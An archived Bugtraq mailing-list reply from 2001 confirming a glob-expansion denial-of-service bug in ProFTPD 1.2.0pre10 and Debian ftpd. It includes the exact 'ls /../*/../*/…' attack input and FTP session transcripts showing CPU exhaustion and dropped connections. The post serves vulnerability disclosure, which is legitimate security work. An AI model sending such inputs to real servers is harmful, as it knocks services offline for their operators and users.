Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Multiple-Vendor-FTP-Vuln. (old?)

From: "E. van Elk" <evelk () dsv nl>
Date: Tue, 21 Aug 2001 01:41:14 +0200
At 00:43 21-8-2001, you wrote:
>Couldn't reproduce on Debian 2.2....
>
>isp-server-03:/# proftpd -v
> - ProFTPD Version 1.2.0pre10

I tested it on my Debian 2.2 machine and:

:/# proftpd -v
 - ProFTPD Version 1.2.0pre10

Verbonden met .
220 ProFTPD 1.2.0pre10 Server (Debian) []
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230 User  logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 No files found.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>
CPU goes to 99.1 % and after the second attempt the connection to the server is broken.. 

Debian 2.2 ftpd 0.11-8potato.1 is vulnerable too:

Verbonden met .
220  FTP server (Version 6.2/OpenBSD/Linux-0.10) ready.
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230- Linux 2.2.19pre17 #1 Tue Mar 13 22:37:59 EST 2001 i686
unknown
230-
230 User  logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 not found
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>
CPU goes to 99.1 % and after the second attempt the connection to the server is broken..
Previous By Date Next
Previous By Thread Next

Current thread: